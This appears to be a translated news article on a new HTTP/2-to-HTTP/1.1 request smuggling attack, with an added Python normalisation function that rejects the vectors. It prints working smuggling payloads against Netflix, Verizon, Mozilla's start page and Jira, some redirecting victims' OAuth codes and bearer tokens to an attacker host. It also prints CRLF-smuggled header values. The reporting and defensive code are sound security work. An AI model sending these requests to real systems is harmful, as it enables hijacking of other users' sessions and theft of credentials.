A new attack on front-end/back-end systems that allows wedging into other users' requests

Web systems whose front end accepts connections over HTTP/2 and forwards them to the back end over HTTP/1.1 are exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted client requests, an attacker can wedge into the content of requests from other users that are processed in the same stream between the front end and the back end. The attack can be used to inject malicious JavaScript code into a session with a legitimate site, bypass access-restriction systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are forwarded in a front-end/back-end scheme. The author of the research demonstrated the possibility of attacking the systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received 56 thousand dollars through vulnerability bounty programs. The problem has also been confirmed in F5 Networks products. The problem partially affects mod_proxy in the Apache HTTP Server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and were given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers simultaneously was blocked in the latest release (1.21.1). Attack tools have already been added to the Burp toolkit and are available in the form of the Turbo Intruder extension.

The principle of the new method of wedging into traffic is similar to the vulnerability identified by the same researcher two years ago, but is limited to front ends that accept requests over HTTP/2 and forward them over HTTP/1.1. Recall that in a front-end/back-end scheme, client requests are received by an additional node, the front end, which establishes a long-lived TCP connection to the back end that directly processes the requests. Requests from different users are usually transmitted over this shared connection, following one after another in a chain, separated by means of the HTTP protocol.

The classic "HTTP Request Smuggling" attack was based on the fact that the front end and the back end interpret the HTTP headers "Content-Length" (defines the total size of the data in the request) and "Transfer-Encoding: chunked" (allows the data to be transferred in pieces) differently. For example, if the front end only honours "Content-Length" but ignores "Transfer-Encoding: chunked", the attacker can send a request containing both the "Content-Length" and "Transfer-Encoding: chunked" headers, where the size in "Content-Length" does not match the size of the chunked chain. In this case, the front end will process and forward the request according to "Content-Length", while the back end will wait for the block to complete based on "Transfer-Encoding: chunked", and the remaining tail of the attacker's request will end up at the beginning of someone else's request that is transmitted next.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and operates on data blocks of a predetermined size. However, HTTP/2 uses pseudo-headers that correspond to regular HTTP headers. When interacting with the back end over HTTP/1.1, the front end translates these pseudo-headers into the corresponding HTTP/1.1 headers. The problem is that the back end makes decisions about parsing the stream based on the HTTP headers set by the front end, without knowing the parameters of the original request.

In particular, the "content-length" and "transfer-encoding" values can be transmitted as pseudo-headers, even though they are not used in HTTP/2, since the size of all data is determined in a separate field. However, when the HTTP/2 request is converted to HTTP/1.1, these headers are carried over and can confuse the back end. There are two main attack variants, H2.TE and H2.CL, in which the back end is misled by an incorrect transfer-encoding or a content-length value that does not match the actual size of the request body received by the front end over HTTP/2.


An example of an H2.CL attack is specifying an incorrect size in the content-length pseudo-header when sending an HTTP/2 request to Netflix. This request leads to the addition of a corresponding Content-Length HTTP header when the back end is accessed over HTTP/1.1, but since the size in Content-Length is smaller than the actual one, part of the data in the tail is processed as the beginning of the next request.

For example, the HTTP/2 request

    :method POST
    :path /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

will cause the following request to be sent to the back end:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length has the value 4, the back end will accept only "abcd" as the body of the request, and the remaining "GET /n HTTP/1.1..." will be processed as the beginning of the next request, which belongs to another user. As a result, the stream becomes desynchronized, and the result of processing the dummy request is returned in response to the next request. In the case of Netflix, specifying a third-party host in the "Host:" header of the dummy request caused the client to receive the response "Location: https://02.rs?x.netflix.com/n", which allowed arbitrary content to be delivered to the client, including executing the attacker's JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves substituting a "Transfer-Encoding: chunked" header. Using the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, and requests containing it are required to be treated as erroneous. Despite this, some front-end implementations do not take this into account and allow the transfer-encoding pseudo-header in HTTP/2, converting it into the corresponding HTTP header. If a "Transfer-Encoding" header is present, the back end may treat it as taking priority and parse the data piece by piece in "chunked" mode, using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the original framing by total size.

The existence of such a gap was demonstrated with the example of Verizon. The problem affected the authentication and content management portal, which is also used on sites such as Huffington Post and Engadget. For example, the client request over HTTP/2

    :method POST
    :path /identity/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

led to the following HTTP/1.1 request being sent to the back end:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The back end, in turn, ignored the "Content-Length" header and split the stream based on "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's site, including intercepting requests related to OAuth authentication, whose parameters appeared in the Referer header, as well as to simulate an authentication session and cause the user's system to send credentials to the attacker's host:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sIkIk6…

To attack HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified, another method was proposed: the "Transfer-Encoding" header is smuggled in by appending it to another pseudo-header, separated by a newline (when converted to HTTP/1.1, this produces two separate HTTP headers).

For example, Atlassian Jira and Netlify CDN (which was used to serve the Firefox start page for Mozilla) were affected by this problem. Specifically, the HTTP/2 request

    :method POST
    :path /
    :authority start.mozilla.org
    foo b\r\ntransfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

led to the following HTTP/1.1 request being sent to the back end:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another way to substitute the "Transfer-Encoding" header was to append it to the name of another pseudo-header or to the line containing the request method. For example, when accessing Atlassian Jira, a pseudo-header named "foo: bar\r\ntransfer-encoding" with the value "chunked" caused the HTTP headers "foo: bar" and "transfer-encoding: chunked" to be added, and specifying the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" in the ":method" pseudo-header was translated into "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
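The three vectors described above (a content-length that disagrees with the body actually received, a transfer-encoding header, and CR/LF hidden in a header name, a header value or the :method pseudo-header) are exactly what a front end has to reject before it rewrites an HTTP/2 request as HTTP/1.1. The following is an added example of such a normalisation step, not code from the article or from any product named in it; the (name, value) header-list format and the function name h2_to_h1 are assumptions.

```python
import re

# RFC 9113 section 8.2.1: field names are lowercase tokens (pseudo-headers carry
# a leading colon) and field values may not contain CR, LF or NUL. These are
# constructed checks for this example, not taken from any library.
_NAME_RE = re.compile(rb":?[!#$%&'*+\-.^_`|~0-9a-z]+")
_METHOD_RE = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
_BAD_VALUE = re.compile(rb"[\x00\r\n]")


def h2_to_h1(headers, body):
    """Translate one HTTP/2 request (header list as (name, value) byte pairs plus
    the concatenated DATA frames) into an HTTP/1.1 request for the back end.
    Returns (request_bytes, None), or (None, reason) when the back end could
    frame the request differently from this front end."""
    pseudo, regular = {}, []
    for name, value in headers:
        # Refuses names such as 'foo: bar\r\ntransfer-encoding' and values such
        # as 'b\r\ntransfer-encoding: chunked': neither may become a second line.
        if not _NAME_RE.fullmatch(name) or _BAD_VALUE.search(value):
            return None, "malformed header %r" % name
        if name.startswith(b":"):
            pseudo[name] = value
        else:
            regular.append((name, value))
    for need in (b":method", b":path", b":authority"):
        if need not in pseudo:
            return None, "missing pseudo-header %r" % need
    if not _METHOD_RE.fullmatch(pseudo[b":method"]):
        return None, "malformed :method"  # blocks 'GET / HTTP/1.1 ...' methods
    for name, value in regular:
        if name == b"transfer-encoding":
            # Forbidden in HTTP/2; forwarding it is the H2.TE vector.
            return None, "transfer-encoding is not allowed in HTTP/2"
        if name == b"content-length" and value != str(len(body)).encode():
            # The body is framed by the DATA frames actually received; a
            # disagreeing content-length is the H2.CL vector.
            return None, "content-length %r != body length %d" % (value, len(body))
    lines = [pseudo[b":method"] + b" " + pseudo[b":path"] + b" HTTP/1.1",
             b"Host: " + pseudo[b":authority"]]
    lines += [n + b": " + v for n, v in regular if n != b"content-length"]
    # Always emit Content-Length from the real body size so the back end's
    # framing is pinned to what the front end read.
    lines.append(b"Content-Length: " + str(len(body)).encode())
    return b"\r\n".join(lines) + b"\r\n\r\n" + body, None
```

Fed the article's Netflix, Verizon, Netlify and Jira requests, the function returns a reason instead of an HTTP/1.1 request; a well-formed POST with a matching body is rewritten with a single Content-Length derived from the body.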

The researcher who identified the problem also proposed a request tunnelling technique for attacking front ends in which each IP address establishes a separate connection to the back end and traffic from different users is not mixed. The proposed technique does not allow interfering with other users' requests, but it makes it possible to poison a shared cache that affects the processing of other requests, and allows substituting internal HTTP headers used to pass service information from the front end to the back end (for example, when authentication is performed on the front-end side, such headers can pass information about the current user to the back end). As an example of applying the method, it was possible to gain control over pages in the Bitbucket service through cache poisoning.

Source: opennet.ru
